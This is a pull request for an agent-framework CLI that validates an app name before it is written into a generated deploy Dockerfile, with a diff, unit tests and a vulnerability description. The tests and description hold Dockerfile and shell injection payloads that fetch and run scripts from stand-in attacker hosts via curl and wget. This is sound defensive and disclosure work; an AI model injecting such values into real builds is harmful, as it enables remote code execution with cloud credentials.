### PR TITLE
fix(cli): validate app_name before interpolating it into the deploy Dockerfile

### DIFF
--- a/src/google/adk/cli/cli_deploy.py
+++ b/src/google/adk/cli/cli_deploy.py
@@ -17,6 +17,7 @@ from datetime import datetime
 import importlib
 import json
 import os
+import re
 import shutil
 import subprocess
 import sys
@@ -417,6 +418,34 @@ def _resolve_project(project_in_option: Optional[str]) -> str:
   return project
 
 
+# app_name is interpolated verbatim into the generated Dockerfile (COPY/RUN
+# instructions and the shell-form CMD) by _DOCKERFILE_TEMPLATE. It defaults to
+# the basename of the agent source folder, so its value can come from a
+# directory name the deploying developer did not choose (a cloned or shared
+# agent template). Restrict it to a plain identifier before it reaches the
+# template so it cannot break out of a Dockerfile instruction or the CMD shell.
+_APP_NAME_PATTERN: Final[re.Pattern[str]] = re.compile(r'^[A-Za-z0-9_-]{1,63}$')
+
+
+def _validate_app_name(app_name: str) -> None:
+  """Validates the deploy app name before it is written into a Dockerfile.
+
+  Args:
+    app_name: The app name, either passed via --app_name or derived from the
+      agent source folder basename.
+
+  Raises:
+    click.ClickException: If the app name is not a plain identifier.
+  """
+  if not _APP_NAME_PATTERN.match(app_name):
+    raise click.ClickException(
+        f'Invalid app name {app_name!r}. The app name is used in the generated'
+        ' Dockerfile and must contain only letters, digits, hyphens and'
+        ' underscores (1-63 characters). Pass a valid --app_name, or rename the'
+        ' agent folder, since its basename is used when --app_name is omitted.'
+    )
+
+
 def _validate_gcloud_extra_args(
     extra_gcloud_args: Optional[tuple[str, ...]], adk_managed_args: set[str]
 ) -> None:
@@ -706,6 +735,7 @@ def to_cloud_run(
       execution.
   """
   app_name = app_name or os.path.basename(agent_folder)
+  _validate_app_name(app_name)
   if parse(adk_version) >= parse('1.3.0') and not use_local_storage:
     session_service_uri = session_service_uri or 'memory://'
     artifact_service_uri = artifact_service_uri or 'memory://'
@@ -952,6 +982,7 @@ def to_agent_engine(
       paths to stage alongside the agent and make importable in the image.
   """
   app_name = os.path.basename(agent_folder)
+  _validate_app_name(app_name)
   display_name = display_name or app_name
   parent_folder = os.path.dirname(agent_folder)
   if adk_app_object:
@@ -1375,6 +1406,7 @@ def to_gke(
   click.echo('--------------------------------------------------\n')
 
   app_name = app_name or os.path.basename(agent_folder)
+  _validate_app_name(app_name)
   if parse(adk_version) >= parse('1.3.0') and not use_local_storage:
     session_service_uri = session_service_uri or 'memory://'
     artifact_service_uri = artifact_service_uri or 'memory://'

--- a/tests/unittests/cli/utils/test_cli_deploy.py
+++ b/tests/unittests/cli/utils/test_cli_deploy.py
@@ -444,6 +444,40 @@ def test_to_gke_happy_path(
 
 
 # _validate_agent_import tests
+class TestValidateAppName:
+  """Tests for the _validate_app_name function."""
+
+  @pytest.mark.parametrize(
+      "app_name",
+      ["ssr", "my-agent", "my_agent", "agent2", "A", "a" * 63],
+  )
+  def test_accepts_plain_identifiers(self, app_name: str) -> None:
+    # Should not raise.
+    cli_deploy._validate_app_name(app_name)
+
+  @pytest.mark.parametrize(
+      "app_name",
+      [
+          # Breaks out of a Dockerfile instruction.
+          'myagent"\nRUN curl https://attacker.example/x.sh | sh\n#',
+          # Breaks out of the shell-form CMD.
+          "x ; wget http://attacker/c2 -O /tmp/c2 ; sh /tmp/c2 #",
+          # Quotes and spaces.
+          'a" "b',
+          "has space",
+          # Empty and over-long.
+          "",
+          "a" * 64,
+          # Path traversal shape.
+          "../evil",
+      ],
+  )
+  def test_rejects_unsafe_names(self, app_name: str) -> None:
+    with pytest.raises(click.ClickException) as exc_info:
+      cli_deploy._validate_app_name(app_name)
+    assert "Invalid app name" in str(exc_info.value)
+
+
 class TestValidateAgentImport:
   """Tests for the _validate_agent_import function."""
 


### PR DESCRIPTION
`adk deploy` builds the container Dockerfile in `cli_deploy.py` by interpolating `app_name` into `_DOCKERFILE_TEMPLATE` with no validation. `app_name` defaults to the basename of the agent source folder (`app_name = app_name or os.path.basename(agent_folder)`), so its value can come from a directory name the deploying developer did not choose, for example a cloned or shared agent template whose folder name was picked by the template's author.

The template places `app_name` directly into instruction context:

```dockerfile
COPY --chown=myuser:myuser "agents/{app_name}/" "/app/agents/{app_name}/"
RUN pip install -r "/app/agents/{app_name}/requirements.txt"
CMD adk {command} --port={port} ... {gemini_enterprise_option}{express_mode_option} "/app/agents"
```

A value containing a quote and a newline breaks out of the `COPY`/`RUN` line and becomes its own Dockerfile instruction, which runs during `docker build` (typically in Cloud Build, with a service-account credential and network egress). In the `agent_engine` path there is a second sink: `gemini_enterprise_option=f'--gemini_enterprise_app_name={app_name}'` lands in the shell-form `CMD`, so the same value can inject a shell command into the container's start command.

All three deploy subcommands are affected: `to_cloud_run`, `to_agent_engine` and `to_gke` all format the same template with the same unvalidated `app_name`.

This is the same class as the already-merged JS fix (google/adk-js PR #604, `assertSafeDockerfileToken`), which is not present in the Python port.

Verified by executing the real `_DOCKERFILE_TEMPLATE` from this file: an `app_name` of `myagent"\nRUN curl https://attacker.example/x.sh | sh\n#` produces a Dockerfile whose injected `RUN curl ... | sh` is a standalone instruction, and an `agent_engine` `app_name` of `x ; sh /tmp/c2 #` produces a `CMD` line with `; sh /tmp/c2` as a separate shell command.

The fix adds `_validate_app_name`, restricting `app_name` to `^[A-Za-z0-9_-]{1,63}$` (which the default `ssr`, and any ordinary agent folder name, satisfies), and calls it in all three paths right after `app_name` is resolved, raising a `ClickException` otherwise. Tests in `test_cli_deploy.py` cover both accepted identifiers and the rejected breakout payloads.

`python -m pytest tests/unittests/cli/utils/test_cli_deploy.py tests/unittests/cli/utils/test_cli_deploy_to_cloud_run.py` passes (74 tests).
